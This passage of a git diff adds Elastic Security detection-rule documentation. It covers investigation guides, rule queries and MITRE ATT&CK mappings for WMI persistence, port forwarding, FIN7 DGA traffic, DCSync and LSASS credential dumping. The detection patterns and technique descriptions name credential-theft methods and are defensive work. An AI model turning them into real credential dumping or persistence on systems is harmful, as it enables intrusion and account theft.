{security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the process executable using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.parent.executable : "C:\\Windows\\System32\\svchost.exe" and + process.parent.args : "UsoSvc" and + not process.executable : + ("?:\\ProgramData\\Microsoft\\Windows\\UUS\\Packages\\*\\amd64\\MoUsoCoreWorker.exe", + "?:\\Windows\\System32\\UsoClient.exe", + "?:\\Windows\\System32\\MusNotification.exe", + "?:\\Windows\\System32\\MusNotificationUx.exe", + "?:\\Windows\\System32\\MusNotifyIcon.exe", + "?:\\Windows\\System32\\WerFault.exe", + "?:\\Windows\\System32\\WerMgr.exe", + "?:\\Windows\\UUS\\amd64\\MoUsoCoreWorker.exe", + "?:\\Windows\\System32\\MoUsoCoreWorker.exe", + "?:\\Windows\\UUS\\amd64\\UsoCoreWorker.exe", + "?:\\Windows\\System32\\UsoCoreWorker.exe", + "?:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe") and + not process.name : ("MoUsoCoreWorker.exe", "OfficeC2RClient.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Create or Modify System Process +** ID: T1543 +** Reference URL: https://attack.mitre.org/techniques/T1543/ +* Sub-technique: +** Name: Windows Service +** ID: T1543.003 +** Reference URL: https://attack.mitre.org/techniques/T1543/003/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-wmi-event-subscription.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-wmi-event-subscription.asciidoc new file mode 100644 index 0000000000..472e191c69 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-wmi-event-subscription.asciidoc @@ -0,0 +1,89 @@ +[[prebuilt-rule-8-10-5-persistence-via-wmi-event-subscription]] +=== Persistence via WMI Event Subscription + +An adversary can use Windows Management Instrumentation (WMI) to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* winlogbeat-* +* logs-windows.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-1 + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + (process.name : "wmic.exe" or process.pe.original_file_name == "wmic.exe") and + process.args : "create" and + process.args : ("ActiveScriptEventConsumer", "CommandLineEventConsumer") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Sub-technique: +** Name: Windows Management Instrumentation Event Subscription +** ID: T1546.003 +** Reference URL: https://attack.mitre.org/techniques/T1546/003/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Windows Management Instrumentation +** ID: T1047 +** Reference URL: https://attack.mitre.org/techniques/T1047/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-port-forwarding-rule-addition.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-port-forwarding-rule-addition.asciidoc new file mode 100644 index 0000000000..a8e5af58b6 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-port-forwarding-rule-addition.asciidoc @@ -0,0 +1,125 @@ +[[prebuilt-rule-8-10-5-port-forwarding-rule-addition]] +=== Port Forwarding Rule Addition + +Identifies the creation of a new port forwarding rule. An adversary may abuse this technique to bypass network segmentation restrictions. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Command and Control +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Port Forwarding Rule Addition + +Network port forwarding is a mechanism to redirect incoming TCP connections (IPv4 or IPv6) from the local TCP port to any other port number, or even to a port on a remote computer. + +Attackers may configure port forwarding rules to bypass network segmentation restrictions, using the host as a jump box to access previously unreachable systems. + +This rule monitors the modifications to the `HKLM\SYSTEM\*ControlSet*\Services\PortProxy\v4tov4\` subkeys. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Contact the account and system owners and confirm whether they are aware of this activity. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. +- Identify the target host IP address, check the connections originating from the host where the modification occurred, and inspect the credentials used. + - Investigate suspicious login activity, such as unauthorized access and logins from outside working hours and unusual locations. + +### False positive analysis + +- This mechanism can be used legitimately. Analysts can dismiss the alert if the Administrator is aware of the activity and there are justifications for this configuration. +- If this rule is noisy in your environment due to expected activity, consider adding exceptions — preferably with a combination of user and command line conditions. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Delete the port forwarding rule. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and registry.path : ( + "HKLM\\SYSTEM\\*ControlSet*\\Services\\PortProxy\\v4tov4\\*", + "\\REGISTRY\\MACHINE\\SYSTEM\\*ControlSet*\\Services\\PortProxy\\v4tov4\\*" +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Protocol Tunneling +** ID: T1572 +** Reference URL: https://attack.mitre.org/techniques/T1572/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-possible-fin7-dga-command-and-control-behavior.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-possible-fin7-dga-command-and-control-behavior.asciidoc new file mode 100644 index 0000000000..9c34e4d98d --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-possible-fin7-dga-command-and-control-behavior.asciidoc @@ -0,0 +1,82 @@ +[[prebuilt-rule-8-10-5-possible-fin7-dga-command-and-control-behavior]] +=== Possible FIN7 DGA Command and Control Behavior + +This rule detects a known command and control pattern in network events. The FIN7 threat group is known to use this command and control technique, while maintaining persistence in their target's network. + +*Rule type*: query + +*Rule indices*: + +* packetbeat-* +* auditbeat-* +* filebeat-* +* logs-network_traffic.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html + +*Tags*: + +* Use Case: Threat Detection +* Tactic: Command and Control +* Domain: Endpoint + +*Version*: 104 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +In the event this rule identifies benign domains in your environment, the `destination.domain` field in the rule can be modified to include those domains. Example: `...AND NOT destination.domain:(zoom.us OR benign.domain1 OR benign.domain2)`. +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +(event.dataset: (network_traffic.tls OR network_traffic.http) or + (event.category: (network OR network_traffic) AND type: (tls OR http) AND network.transport: tcp)) AND +destination.domain:/[a-zA-Z]{4,5}\.(pw|us|club|info|site|top)/ AND NOT destination.domain:zoom.us + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ +* Technique: +** Name: Dynamic Resolution +** ID: T1568 +** Reference URL: https://attack.mitre.org/techniques/T1568/ +* Sub-technique: +** Name: Domain Generation Algorithms +** ID: T1568.002 +** Reference URL: https://attack.mitre.org/techniques/T1568/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-code-execution-via-postgresql.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-code-execution-via-postgresql.asciidoc new file mode 100644 index 0000000000..2deb05c24e --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-code-execution-via-postgresql.asciidoc @@ -0,0 +1,69 @@ +[[prebuilt-rule-8-10-5-potential-code-execution-via-postgresql]] +=== Potential Code Execution via Postgresql + +This rule monitors for suspicious activities that may indicate an attacker attempting to execute arbitrary code within a PostgreSQL environment. Attackers can execute code via PostgreSQL as a result of gaining unauthorized access to a public facing PostgreSQL database or exploiting vulnerabilities, such as remote command execution and SQL injection attacks, which can result in unauthorized access and malicious actions, and facilitate post-exploitation activities for unauthorized access and malicious actions. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action in ("exec", "exec_event", "fork", "fork_event") and +event.type == "start" and user.name == "postgres" and ( + (process.parent.args : "*sh" and process.parent.args : "echo*") or + (process.args : "*sh" and process.args : "echo*") +) and not process.parent.name : "puppet" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-credential-access-via-dcsync.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-credential-access-via-dcsync.asciidoc new file mode 100644 index 0000000000..c32d741541 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-credential-access-via-dcsync.asciidoc @@ -0,0 +1,150 @@ +[[prebuilt-rule-8-10-5-potential-credential-access-via-dcsync]] +=== Potential Credential Access via DCSync + +This rule identifies when a User Account starts the Active Directory Replication Process. Attackers can use the DCSync technique to get credential information of individual accounts or the entire domain, thus compromising the entire domain. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-system.* +* logs-windows.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-180815210510.html +* https://threathunterplaybook.com/library/windows/active_directory_replication.html?highlight=dcsync#directory-replication-services-auditing +* https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/security/win_ad_replication_non_machine_account.yml +* https://github.com/atc-project/atomic-threat-coverage/blob/master/Atomic_Threat_Coverage/Logging_Policies/LP_0027_windows_audit_directory_service_access.md +* https://attack.stealthbits.com/privilege-escalation-using-mimikatz-dcsync +* https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Credential Access +* Tactic: Privilege Escalation +* Data Source: Active Directory +* Resources: Investigation Guide +* Use Case: Active Directory Monitoring + +*Version*: 110 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Potential Credential Access via DCSync + +Active Directory replication is the process by which the changes that originate on one domain controller are automatically transferred to other domain controllers that store the same data. + +Active Directory data consists of objects that have properties, or attributes. Each object is an instance of an object class, and object classes and their respective attributes are defined in the Active Directory schema. Objects are defined by the values of their attributes, and changes to attribute values must be transferred from the domain controller on which they occur to every other domain controller that stores a replica of an affected object. + +Adversaries can use the DCSync technique that uses Windows Domain Controller's API to simulate the replication process from a remote domain controller, compromising major credential material such as the Kerberos krbtgt keys used legitimately for tickets creation, but also tickets forging by attackers. This attack requires some extended privileges to succeed (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All), which are granted by default to members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups. Privileged accounts can be abused to grant controlled objects the right to DCsync/Replicate. + +More details can be found on [Threat Hunter Playbook](https://threathunterplaybook.com/library/windows/active_directory_replication.html?highlight=dcsync#directory-replication-services-auditing) and [The Hacker Recipes](https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync). + +This rule monitors for Event ID 4662 (Operation was performed on an Active Directory object) and identifies events that use the access mask 0x100 (Control Access) and properties that contain at least one of the following or their equivalent Schema-Id-GUID (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All, DS-Replication-Get-Changes-In-Filtered-Set). It also filters out events that use computer accounts and also Azure AD Connect MSOL accounts (more details [here](https://techcommunity.microsoft.com/t5/microsoft-defender-for-identity/ad-connect-msol-user-suspected-dcsync-attack/m-p/788028)). + +#### Possible investigation steps + +- Identify the user account that performed the action and whether it should perform this kind of action. +- Contact the account and system owners and confirm whether they are aware of this activity. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Correlate security events 4662 and 4624 (Logon Type 3) by their Logon ID (`winlog.logon.id`) on the Domain Controller (DC) that received the replication request. This will tell you where the AD replication request came from, and if it came from another DC or not. +- Scope which credentials were compromised (for example, whether all accounts were replicated or specific ones). + +### False positive analysis + +- Administrators may use custom accounts on Azure AD Connect, investigate if it is the case, and if it is properly secured. If noisy in your environment due to expected activity, consider adding the corresponding account as a exception. +- Although replicating Active Directory (AD) data to non-Domain Controllers is not a common practice and is generally not recommended from a security perspective, some software vendors may require it for their products to function correctly. If this rule is noisy in your environment due to expected activity, consider adding the corresponding account as a exception. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- If the entire domain or the `krbtgt` user was compromised: + - Activate your incident response plan for total Active Directory compromise which should include, but not be limited to, a password reset (twice) of the `krbtgt` user. +- Investigate how the attacker escalated privileges and identify systems they used to conduct lateral movement. Use this information to determine ways the attacker could regain access to the environment. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +any where event.action == "Directory Service Access" and + event.code == "4662" and winlog.event_data.Properties : ( + + /* Control Access Rights/Permissions Symbol */ + + "*DS-Replication-Get-Changes*", + "*DS-Replication-Get-Changes-All*", + "*DS-Replication-Get-Changes-In-Filtered-Set*", + + /* Identifying GUID used in ACE */ + + "*1131f6ad-9c07-11d1-f79f-00c04fc2dcd2*", + "*1131f6aa-9c07-11d1-f79f-00c04fc2dcd2*", + "*89e95b76-444d-4c62-991a-0facbeda640c*") + + /* The right to perform an operation controlled by an extended access right. */ + + and winlog.event_data.AccessMask : "0x100" and + not winlog.event_data.SubjectUserName : ("*$", "MSOL_*", "OpenDNS_Connector") + + /* The Umbrella AD Connector uses the OpenDNS_Connector account to perform replication */ + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: OS Credential Dumping +** ID: T1003 +** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Sub-technique: +** Name: DCSync +** ID: T1003.006 +** Reference URL: https://attack.mitre.org/techniques/T1003/006/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Domain Accounts +** ID: T1078.002 +** Reference URL: https://attack.mitre.org/techniques/T1078/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-credential-access-via-lsass-memory-dump.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-credential-access-via-lsass-memory-dump.asciidoc new file mode 100644 index 0000000000..6c7b7db93c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-credential-access-via-lsass-memory-dump.asciidoc @@ -0,0 +1,91 @@ +[[prebuilt-rule-8-10-5-potential-credential-access-via-lsass-memory-dump]] +=== Potential Credential Access via LSASS Memory Dump + +Identifies suspicious access to LSASS handle from a call trace pointing to DBGHelp.dll or DBGCore.dll, which both export the MiniDumpWriteDump method that can be used to dump LSASS memory content in preparation for credential access. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-windows.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz +* https://www.elastic.co/security-labs/detect-credential-access + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Credential Access +* Tactic:Execution +* Data Source: Sysmon Only + +*Version*: 207 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.code == "10" and + winlog.event_data.TargetImage : "?:\\WINDOWS\\system32\\lsass.exe" and + + /* DLLs exporting MiniDumpWriteDump API to create an lsass mdmp*/ + winlog.event_data.CallTrace : ("*dbghelp*", "*dbgcore*") and + + /* case of lsass crashing */ + not process.executable : ("?:\\Windows\\System32\\WerFault.exe", "?:\\Windows\\System32\\WerFaultSecure.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: OS Credential Dumping +** ID: T1003 +** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Sub-technique: +** Name: LSASS Memory +** ID: T1003.001 +** Reference URL: https://attack.mitre.org/techniques/T1003/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Native API +** ID: T1106 +** Reference URL: https://attack.mitre.org/techniques/T1106/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-credential-access-via-renamed-com-services-dll.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-credential-access-via-renamed-com-services-dll.asciidoc new file mode 100644 index 0000000000..954d0b2696 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-credential-access-via-renamed-com-services-dll.asciidoc @@ -0,0 +1,93 @@ +[[prebuilt-rule-8-10-5-potential-credential-access-via-renamed-com-services-dll]] +=== Potential Credential Access via Renamed COM+ Services DLL + +Identifies suspicious renamed COMSVCS.DLL Image Load, which exports the MiniDump function that can be used to dump a process memory. This may indicate an attempt to dump LSASS memory while bypassing command-line based detection in preparation for credential access. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-windows.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Credential Access +* Tactic: Defense Evasion +* Data Source: Sysmon Only + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.entity_id with maxspan=1m + [process where host.os.type == "windows" and event.category == "process" and + process.name : "rundll32.exe"] + [process where host.os.type == "windows" and event.category == "process" and event.dataset : "windows.sysmon_operational" and event.code == "7" and + (file.pe.original_file_name : "COMSVCS.DLL" or file.pe.imphash : "EADBCCBB324829ACB5F2BBE87E5549A8") and + /* renamed COMSVCS */ + not file.name : "COMSVCS.DLL"] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: OS Credential Dumping +** ID: T1003 +** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Sub-technique: +** Name: LSASS Memory +** ID: T1003.001 +** Reference URL: https://attack.mitre.org/techniques/T1003/001/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: Rundll32 +** ID: T1218.011 +** Reference URL: https://attack.mitre.org/techniques/T1218/011/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-credential-access-via-trusted-developer-utility.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-credential-access-via-trusted-developer-utility.asciidoc new file mode 100644 index 0000000000..a332b301e2 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-credential-access-via-trusted-developer-utility.asciidoc @@ -0,0 +1,150 @@ +[[prebuilt-rule-8-10-5-potential-credential-access-via-trusted-developer-utility]] +=== Potential Credential Access via Trusted Developer Utility + +An instance of MSBuild, the Microsoft Build Engine, loaded DLLs (dynamically linked libraries) responsible for Windows credential management. This technique is sometimes used for credential dumping. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Credential Access +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Potential Credential Access via Trusted 